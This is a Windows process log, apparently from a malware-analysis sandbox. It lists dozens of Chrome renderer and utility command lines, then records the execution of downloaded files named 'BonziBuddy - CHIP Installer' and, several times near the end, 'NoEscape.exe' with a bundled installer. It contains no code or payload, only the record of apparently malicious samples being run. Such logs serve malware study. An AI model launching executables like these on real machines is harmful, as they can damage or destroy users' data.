"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --mojo-platform-channel-handle=6100 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --mojo-platform-channel-handle=6616 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --mojo-platform-channel-handle=6608 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --mojo-platform-channel-handle=6680 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6724 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6604 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=748 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3364 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Users\Admin\Downloads\BonziBuddy - CHIP Installer _bZQvv.exe
"C:\Users\Admin\Downloads\BonziBuddy - CHIP Installer _bZQvv.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --mojo-platform-channel-handle=6704 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --mojo-platform-channel-handle=4516 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --mojo-platform-channel-handle=3336 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --mojo-platform-channel-handle=4300 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --mojo-platform-channel-handle=6284 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=64 --mojo-platform-channel-handle=5940 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=65 --mojo-platform-channel-handle=6652 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=66 --mojo-platform-channel-handle=6240 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=67 --mojo-platform-channel-handle=4492 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=68 --mojo-platform-channel-handle=3576 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=69 --mojo-platform-channel-handle=4612 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=70 --mojo-platform-channel-handle=6624 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=71 --mojo-platform-channel-handle=4860 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=72 --mojo-platform-channel-handle=2788 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=73 --mojo-platform-channel-handle=4556 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=74 --mojo-platform-channel-handle=2360 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=75 --mojo-platform-channel-handle=4480 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=76 --mojo-platform-channel-handle=2376 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=77 --mojo-platform-channel-handle=4784 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=78 --mojo-platform-channel-handle=6132 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=79 --mojo-platform-channel-handle=6500 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=80 --mojo-platform-channel-handle=6464 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=81 --mojo-platform-channel-handle=4804 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=82 --mojo-platform-channel-handle=5304 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=83 --mojo-platform-channel-handle=2352 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=84 --mojo-platform-channel-handle=4120 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=85 --mojo-platform-channel-handle=5092 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=86 --mojo-platform-channel-handle=3876 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=87 --mojo-platform-channel-handle=6428 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=88 --mojo-platform-channel-handle=6444 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=89 --mojo-platform-channel-handle=4076 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=90 --mojo-platform-channel-handle=4176 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=91 --mojo-platform-channel-handle=5196 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=92 --mojo-platform-channel-handle=2720 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=93 --mojo-platform-channel-handle=5456 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=94 --mojo-platform-channel-handle=3848 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3576 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=96 --mojo-platform-channel-handle=5012 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5016 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3844 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=99 --mojo-platform-channel-handle=5452 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=100 --mojo-platform-channel-handle=6572 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=101 --mojo-platform-channel-handle=2404 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=102 --mojo-platform-channel-handle=4976 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=103 --mojo-platform-channel-handle=1200 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=104 --mojo-platform-channel-handle=5260 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=105 --mojo-platform-channel-handle=2404 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=106 --mojo-platform-channel-handle=5824 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=107 --mojo-platform-channel-handle=2796 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=108 --mojo-platform-channel-handle=4760 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=109 --mojo-platform-channel-handle=1616 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=110 --mojo-platform-channel-handle=2820 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=111 --mojo-platform-channel-handle=6160 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=112 --mojo-platform-channel-handle=5144 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=113 --mojo-platform-channel-handle=5068 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5284 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3396 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=116 --mojo-platform-channel-handle=1620 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=117 --mojo-platform-channel-handle=4732 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=118 --mojo-platform-channel-handle=5020 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=119 --mojo-platform-channel-handle=4084 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4720 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6624 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=122 --mojo-platform-channel-handle=2452 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=123 --mojo-platform-channel-handle=5456 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=124 --mojo-platform-channel-handle=4100 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=125 --mojo-platform-channel-handle=5952 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=126 --mojo-platform-channel-handle=3884 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3832 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4016 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\NoEscape.exe
"C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\NoEscape.exe"
C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\NoEscape.exe
"C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\NoEscape.exe"
C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\vc_redist.x86.exe
"C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\vc_redist.x86.exe"
C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\vc_redist.x86.exe
"C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\vc_redist.x86.exe" -burn.unelevated BurnPipe.{8512F291-0252-49B2-B1A1-A18DCAB98C88} {6E44AD99-92B3-4C13-9C1E-F33174794440} 1540
C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\NoEscape.exe
"C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\NoEscape.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=129 --mojo-platform-channel-handle=2764 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
